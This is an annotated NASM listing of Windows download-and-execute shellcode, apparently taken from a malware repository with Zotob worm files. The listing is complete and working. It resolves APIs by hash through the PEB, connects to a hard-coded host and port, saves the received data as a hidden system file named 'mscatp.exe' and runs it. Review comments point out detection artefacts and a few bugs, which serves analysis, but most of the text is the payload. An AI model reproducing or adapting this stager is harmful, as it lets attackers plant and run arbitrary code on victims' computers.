--------------------------------------------------------------------------------
1 | ; Title: Win32 API Download/Execute file
2 | ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
3 | ; Summary (review): self-locating 32-bit stub that resolves Win32 APIs by name hash, opens a TCP connection,
4 | ; writes whatever it receives to FILENAME (created with hidden+system attributes) and starts that file as a process.
5 | ;To compile:
6 | ;nasmw -fbin -O6 shellcode.asm
7 | ; Artefacts visible in this listing that an analyst can match on: the dropped file name below, the HIDDEN|SYSTEM
8 | ; create flags, and the 32-bit API-name hash constants (the two "mov edx" loads and the .KERNEL32 / .WSOCK32 tables).
9 | FILE_ATTRIBUTE_HIDDEN EQU 2
10 | FILE_ATTRIBUTE_SYSTEM EQU 4
11 | CREATE_ALWAYS EQU 2
12 | FILE_SHARE_READ EQU 1
13 | GENERIC_WRITE EQU 0x40000000
14 |
15 | BUFF_SIZE EQU 512 ; size of the stack scratch area reserved before WSAStartup; also the length passed to recv
16 |
17 | ; Name of the file the received data is written to and then executed.
18 | %xdefine FILENAME 'mscatp.exe'
19 |
20 |
21 | CPU 386
22 | [BITS 32]
23 |
24 |
25 | GLOBAL _entry
26 | _entry:
27 |
28 |     cld ; string instructions (lodsd/lodsb/stosb) must walk upwards
29 |     call Kernel32Base ; the return address pushed here is the address of LGetProcAddress; Kernel32Base pops it into edi
30 |
31 | ; LGetProcAddress: walk the export table of the module at ebx and return the export whose name hash equals edx.
32 | ; ARGS: edx: API name hash
33 | ; ebx: dll address
34 | ; Return: eax: API address
35 | ; ERROR: ecx == 0
36 | LGetProcAddress: ; USES ebx ebp esi edi
37 |     push ebp
38 |     push esi
39 |     push edi
40 |     mov eax, [ebx + 0x3c] ; e_lfanew: offset of the PE header
41 |     lea esi, [ebx + eax + 0x78] ; esi -> export entry of the data directory
42 |     lodsd ; Export Table RVA
43 |     push dword [esi] ; Export Table size
44 |     add eax, ebx ; Export Table address
45 |     push eax
46 |     mov ecx, [eax + 0x18] ; NumberOfNames
47 |     mov ebp, [eax + 0x20]
48 |     add ebp, ebx ; AddressOfNames
49 | ; Names are tried from the last index down to 0.
50 | .Nextf
51 |     jecxz .End1 ; no names left: return with ecx == 0 (the documented error state)
52 |     dec ecx
53 |     mov esi, [ebp + ecx * 4]
54 |     add esi, ebx ; esi -> exported name string
55 |     xor edi, edi ; edi = running hash
56 |
57 | .Lhash
58 |     xor eax, eax
59 |     lodsb
60 |     cmp al, ah ; ah is 0, so this tests for the terminating NUL
61 |     je .Fh
62 |     ror edi, 13 ; hash = ror(hash, 13) + byte
63 |     add edi, eax
64 |     jmp short .Lhash
65 |
66 | .Fh
67 |     cmp edi, edx ; does this name hash to the requested value?
68 |     jnz .Nextf
69 |
70 |     pop ebp ; Export Table
71 |     mov edx, [ebp + 0x24]
72 |     add edx, ebx ; AddressOfNameOrdinals
73 |     mov cx, [edx + ecx * 2] ; cx = ordinal for the matching name
74 |     mov edx, [ebp + 0x1C]
75 |     add edx, ebx ; AddressOfFunctions
76 |     mov eax, [edx + 4 * ecx] ; function RVA
77 |     add eax, ebx
78 | ; An address that lies inside the export directory is handled below as a forwarder string ("DLL.Function"), not as code.
79 | .FDone
80 |     pop ecx ; Export Table size
81 |     push eax
82 |     sub eax, ebp ; offset of the result from the Export Table address
83 |     cmp eax, ecx
84 |     pop eax
85 |     ja .End2 ; outside the export directory: ordinary export, return it
86 |
87 |     xchg esi, eax ; Export Forwarding
88 |     sub esp, byte 0x40 ; 0x40-byte stack buffer for the forwarder's module name
89 |     mov edi, esp
90 | ; Copy bytes up to the '.'; the first stosb stores a stale byte, which the "inc edi" below skips.
91 | .FCopy
92 |     stosb
93 |     lodsb
94 |     cmp al, '.'
95 |     jne .FCopy
96 |
97 |     mov byte [edi], 0 ; NUL-terminate the module name
98 |     mov edi, esp
99 |     inc edi
100 |
101 |     mov ebp, [esp + 0x48] ; old EBP
102 |     push edi
103 |     call [ebp - __LOADLIBRARY] ; load the module named by the forwarder
104 |     push esi ; esi -> text after the '.'
105 |     push eax
106 |     call [ebp - __GETPROCADDR]
107 |     add esp, byte (0x40 - 8) ; together with the add at .End1 this releases the 0x40-byte buffer
108 |     mov cl, 1 ;ecx != 0
109 |
110 | .End1
111 |     add esp, byte 8 ; drop the two dwords (table address, table size) still on the stack on the no-match path
112 | .End2
113 |     pop edi
114 |     pop esi
115 |     pop ebp
116 |     ret
117 |
118 | ; Kernel32Base: obtain a module base into ebx (taken to be kernel32), then build the API slot table below ebp and run the payload.
119 | Kernel32Base:
120 |     mov eax, [fs:0x30] ; fs:[0x30] holds the PEB pointer on 32-bit Windows
121 |     test eax, eax
122 |     js .find_kernel32_9x ; sign bit set selects the path the author labels "9x"
123 | .find_kernel32_nt
124 |     mov eax, [eax + 0x0c] ; PEB loader data
125 |     mov esi, [eax + 0x1c] ; head of the initialization-order module list
126 |     lodsd ; eax = next list entry
127 |     mov ebx, [eax + 0x8] ; base address stored in that entry
128 |     jmp short .kf
129 | .find_kernel32_9x
130 |     mov eax, [eax + 0x34] ; NOTE(review): 9x-specific offsets, meaning not verifiable from this listing
131 |     mov ebx, [eax + 0xB8]
132 | .kf
133 |
134 |     pop edi ; return address of "call Kernel32Base" = address of LGetProcAddress
135 |
136 | ; ebx = kernel32
137 | ; edi = LGetProcAddress
138 |
139 |     mov ebp, esp ; every resolved address is pushed below ebp and later called as [ebp - NAME]
140 |     push ebx ; __KERNEL32
141 |
142 |     mov edx, 0xec0e4e8e ; LoadLibraryA
143 |     call edi
144 |     push eax ; __LOADLIBRARY
145 |
146 |     mov edx, 0x7c0dfcaa ; GetProcAddress
147 |     call edi
148 |     push eax ; __GETPROCADDR
149 |     push eax ; reserves the DL_FILENAME slot; its value is overwritten at .lpFileName
150 |
151 | ; Offsets of the four fixed slots below ebp.
152 | __KERNEL32 EQU 0x4 ;[ebp - 4]
153 | __LOADLIBRARY EQU 0x8 ;[ebp - 8]
154 | __GETPROCADDR EQU 0xC ;[ebp - 0xC]
155 | DL_FILENAME EQU 0x10 ;[ebp - 0x10]
156 |
157 | STACK_CNT EQU DL_FILENAME ; bytes already used below ebp by the fixed slots
158 |
159 |     call .LoadK32 ; the return address pushed here is the address of the .KERNEL32 hash table
160 | ; Table of name hashes; the EQU next to each entry is the slot offset below ebp where its address ends up.
161 | .KERNEL32
162 | CloseHandle EQU ((1*4) + STACK_CNT)
163 |     dd 0x0ffd97fb
164 | CreateFile EQU ((2*4) + STACK_CNT)
165 |     dd 0x7c0017a5
166 | WriteFile EQU ((3*4) + STACK_CNT)
167 |     dd 0xe80a791f
168 | ExitThread EQU ((4*4) + STACK_CNT)
169 |     dd 0x60e0ceef
170 | CreateProcess EQU ((5*4) + STACK_CNT)
171 |     dd 0x16b3fe72
172 |
173 |
174 | K32_APINUM EQU (($-.KERNEL32)/4) ; number of dword hashes in the table above
175 |
176 | .LoadK32
177 |     pop esi ; esi -> .KERNEL32 table
178 |     push K32_APINUM
179 |     pop ecx
180 | ; Resolve each hash through edi (LGetProcAddress, ebx = module base) and push the result into its slot.
181 | .k32
182 |     push ecx ; LGetProcAddress changes ecx, so the loop counter is saved around the call
183 |     lodsd
184 |     xchg edx, eax ; edx = next hash
185 |     call edi
186 |     pop ecx
187 |     push eax ;save APIs on stack
188 |
189 |     loop .k32
190 |
191 |
192 |     call .LoadWsock32 ; the return address pushed here points at the DLL name string below
193 |
194 |     db 'WS2_32', 0,0 ; 8 bytes: name passed to LoadLibrary, skipped afterwards by two lodsd
195 |
196 | .WSOCK32
197 | ; Second hash table; slot offsets continue after the K32_APINUM slots.
198 | WSAStartup EQU (((1*4) + STACK_CNT) + (K32_APINUM*4))
199 |     dd 0x3bfcedcb
200 | socket EQU (((2*4) + STACK_CNT) + (K32_APINUM*4))
201 |     dd 0x492f0b6e
202 | closesocket EQU (((3*4) + STACK_CNT) + (K32_APINUM*4))
203 |     dd 0x79c679e7
204 | connect EQU (((4*4) + STACK_CNT) + (K32_APINUM*4))
205 |     dd 0x60aaf9ec
206 | recv EQU (((5*4) + STACK_CNT) + (K32_APINUM*4))
207 |     dd 0xe71819b6
208 |
209 | WSOCK32_APINUM EQU (($-.WSOCK32)/4)
210 |
211 | .LoadWsock32
212 |     pop esi ; esi -> 'WS2_32' string
213 |
214 |     push esi
215 |     call [ebp - __LOADLIBRARY]
216 |     xchg ebx, eax ; ebx = handle of the loaded module, used as the dll address for edi
217 |
218 |     push WSOCK32_APINUM
219 |     pop ecx
220 |     lodsd ; skip the 8-byte name: esi -> .WSOCK32 table
221 |     lodsd
222 |
223 | .Wsock32
224 |     push ecx
225 |     lodsd
226 |     xchg edx, eax
227 |     call edi
228 |     pop ecx
229 |     push eax ;save APIs on stack
230 |
231 |     loop .Wsock32
232 |
233 |     sub esp, BUFF_SIZE ; stack scratch area; WSAStartup writes its output structure here
234 |     push esp
235 |     push 2 ; requested version word
236 |     call [ebp - WSAStartup]
237 |
238 |     xor eax, eax
239 |     push eax ; two extra zero dwords: they stay on the stack and pad the sockaddr built below to 16 bytes
240 |     push eax
241 |     push eax ; protocol = 0
242 |     push 1 ; type = 1 (stream)
243 |     push 2 ; address family = 2
244 |     call [ebp - socket]
245 |     xchg ebx, eax ; ebx = socket
246 |
247 |     push 0x0100007f ;host: 127.0.0.1
248 |     push 0x11220002 ;port: 8721
249 |     mov edx, esp ; edx -> 16-byte socket address {family 2, port, address, 8 zero bytes}
250 | ; The CreateFile arguments are pushed before connect(); CreateFile itself is called only if connect succeeds.
251 |     push 0 ; hTemplateFile
252 |     push FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM ; dwFlagsAndAttributes
253 |     push CREATE_ALWAYS ; dwCreationDisposition
254 |     push 0 ; lpSecurityAttributes
255 |     push FILE_SHARE_READ ; dwShareMode
256 |     push GENERIC_WRITE ; dwDesiredAccess
257 |     call .lpFileName ; the return address pushed here is the address of the inline file-name string
258 |     DB FILENAME,0
259 |
260 | .lpFileName
261 |     pop eax
262 |     mov [ebp - DL_FILENAME], eax ; keep the name pointer for CreateProcess
263 |     push eax ; lpFileName
264 |
265 |     push 0x10 ; length of the socket address
266 |     push edx
267 |     push ebx
268 |     call [ebp - connect]
269 |     or eax, eax
270 |     jnz .cs ; connect failed: skip the download
271 |
272 |     call [ebp - CreateFile]
273 |     xchg esi, eax ; esi = value returned by CreateFile (file handle)
274 |     inc eax ; NOTE(review): after the xchg eax holds the previous esi, so this inc/jz pair does not examine the CreateFile result
275 |     jz .cs
276 |
277 |     mov edi, esp ; edi = receive buffer: the current stack top (socket address bytes followed by the scratch area)
278 | .recvloop
279 |     push 0 ; flags
280 |     push BUFF_SIZE
281 |     push edi
282 |     push ebx
283 |     call [ebp - recv]
284 |     or eax, eax
285 |     jle .cf ; 0 or negative return: stop receiving
286 |
287 |     push 0 ; lpOverlapped
288 |     push esp ; lpNumberOfBytesWritten -> the zero dword just pushed
289 |     push eax ; byte count returned by recv
290 |     push edi
291 |     push esi
292 |     call [ebp - WriteFile] ; return value is not checked
293 |     jmp short .recvloop
294 |
295 | .cf
296 |     push esi
297 |     call [ebp - CloseHandle]
298 |
299 | .cs
300 |     push ebx
301 |     call [ebp - closesocket]
302 | ; Reached on every path, including a failed connect: the file name is launched regardless.
303 |     push esp ; lpProcessInformation: the 16 bytes at the current stack top
304 |     lea edi, [esp + 0x14] ; startup-info structure placed directly after those 16 bytes
305 |     push edi
306 |     xor eax, eax
307 |     push 0x44
308 |     pop ecx
309 |     mov [edi], ecx ; first dword (size field) = 0x44
310 |     inc edi
311 |     rep stosb ; zero 0x44 bytes starting at the second byte of the structure
312 |
313 |     mov cl, 7
314 | .push0
315 |     push eax ; seven zero arguments (lpCommandLine through lpCurrentDirectory)
316 |     loop .push0
317 |     push DWORD [ebp - DL_FILENAME] ; lpApplicationName = saved file-name pointer
318 |     call [ebp - CreateProcess]
319 | ; No argument is pushed for the next two calls: they consume the first two dwords of the process-information block at the stack top.
320 |     call [ebp - CloseHandle]
321 |     call [ebp - CloseHandle]
322 |
323 | .exit
324 |     push 0
325 |     call [ebp - ExitThread]
326 |
--------------------------------------------------------------------------------
/zotob/Zotob Code/RELEASE/zotob.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/zotob/Zotob Code/RELEASE/zotob.zip
--------------------------------------------------------------------------------